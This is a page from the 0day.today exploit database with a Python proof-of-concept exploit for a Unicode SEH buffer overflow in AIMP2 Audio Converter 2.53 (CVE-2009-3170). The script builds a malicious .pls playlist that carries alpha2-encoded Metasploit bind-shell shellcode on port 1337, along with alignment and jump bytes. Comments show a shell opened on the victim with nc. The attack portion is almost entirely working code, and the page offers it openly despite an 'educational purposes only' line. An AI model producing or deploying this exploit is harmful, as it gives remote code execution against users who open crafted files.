0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF

Author

mr_me

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-8157

Category

local exploits

Date add

21-11-2009

Platform

unsorted

===================================================================
AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF
===================================================================



# Title: AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF
# CVE-ID: (CVE-2009-3170)
# OSVDB-ID: ()
# Author: mr_me
# Published: 2009-11-21
# Verified: yes

view source
print?
#!/usr/bin/python
#
# ######################################################################
#
# *** For educational purposes only ***
#        You have been warned
#
# My original crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exemption handler to overwrite EIP...
#
# EIP 00410041
#
# The Info:
#
# I knew this exploit was always possible, but I failed to have the knowledge
# and experiance to complete it. Many thanks goes to corelanc0d3r for
# demonstrating this unicode concept on his blog. I downloaded his PoC however it 
# did not work on my VM so I remade it with some fun shellcode :)
#
# Visit corelanc0d3r's blog: http://www.corelan.be:8800/
#
# root@home:/home/mrme# nc -v 192.168.2.6 1337
# 192.168.2.6: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [192.168.2.6] 1337 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\AIMP2\Langs>
#
 
# Metasploit bind shell on port 1337
# Encoded using Skylined's alpha2 encoder
 
shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQA"
"IAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1"
"111AIAJQI1AYAZBABABABAB30APB944JBKLQZJKPMK8JYKOKOKOQPTK"
"2LMTMTDKOUOLTKCLKUT8M1JOTKPOLXTKQOMPM1JKOY4KNTTKM1JNNQ9"
"04Y6LU4I0D4M77QHJLMKQ92ZKL4OK0TMTO8BUIUTK1OO4KQZK1VDKLL"
"PKTKQOMLM1ZKM3NLTKU9RLMTMLQQ7SNQ9KQTTK0CNP4KOPLL4KRPMLV"
"M4KOPLHQN384NPNLNJLPPKOJ6QVPSQVQX03OBRHT7RSNR1OB4KO8PBH"
"XKZMKLOKR0KOHVQOU9YU1VE1JMM8KRB5QZLBKOXPBH8YM9JUFMQGKOZ"
"6PSPSR30SQCPC23PCPSKOXPC6RHKUP936PSSYYQV5QX5TMJ40GWPWKO"
"8VRJLPR1R5KOHPQXG4VMNNIY0WKOZ6QC25KOXPBH9U19U6OY27KO9FP"
"PR4R41EKOXPUC1X9W49GVRYPWKO8V0UKOXP1VQZRD2FQXQSBMU9YUQZ"
"0PPYNI8LTI9W2J14U9K201GPKCUZKNORNMKNPBNL63TM2ZNXVKFK6KQ"
"XBRKNVSN6KOT5Q4KOIFQK0WB2PQ0Q0Q1ZM1PQR1PUR1KOXPRHVMJ9KU"
"8NQCKOHVQZKOKO07KOZ0DK0WKLTCWTRDKOHV0RKO8P38JPTJKTQOR3K"
"O8VKO8PKZA")
 
header = ("[playlist]\nNumberOfEntries=3\n\n");
header += ("File1=");
crash = ('\x41' * 1985)             # offset before shellcode
crash += shellcode          # add the shellcode
crash += ('\41' * (4033-len(crash)))    # remaining offset (1st block)
crash += ('\x41\x6d')               # inc ecx + add byte ptr [ebp],ch
crash += ('\x0e\x45')               # seh handler (p/p/r in aimp2.dll)
 
# We needed an address that is located at or close to our shellcode
# We find one on the forth address from the stack
 
align = '\x58'              # pop eax
align += '\x6d'
align += '\x58'             # pop eax
align += '\x6d'
align += '\x58'             # pop eax
align += '\x6d'
align += '\x58'             # pop eax
align += '\x6d'
 
# Here we adjust the value of eax to the address of where our shellcode
# is.. (in the original buffer)
 
align += '\x05\x02\x22'         # add eax,22000200   
align += '\x6d' 
align += '\x2d\x09\x11'         # sub eax,11000900
align += '\x6d'
align += '\x2d\x09\x11'         # sub eax,11000900
align += '\x6d'  
 
# Eax now equals 0x0012EDA0 which is the location of our shellcode. We push
# eax onto the stack and jump to it so its executed
 
jump ='\x50'                # push eax       
jump += '\x6d' 
jump += '\xc3'              # jmp eax
 
finish = ('\x42' * (963-len(align)-len(jump)))
buffer = header + crash + align + jump + finish + '\n'
 
file=open('mr_me_owns_aimp.pls','w')
file.write(buffer)
file.close()
print "[+] mr_me_owns_aimp.pls file created successfully"



#  0day.today [2024-07-07]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

AIMP2 Audio Converter <= 2.53 build 330 Playlist (.pls) Unicode BOF

Report Error

Report Error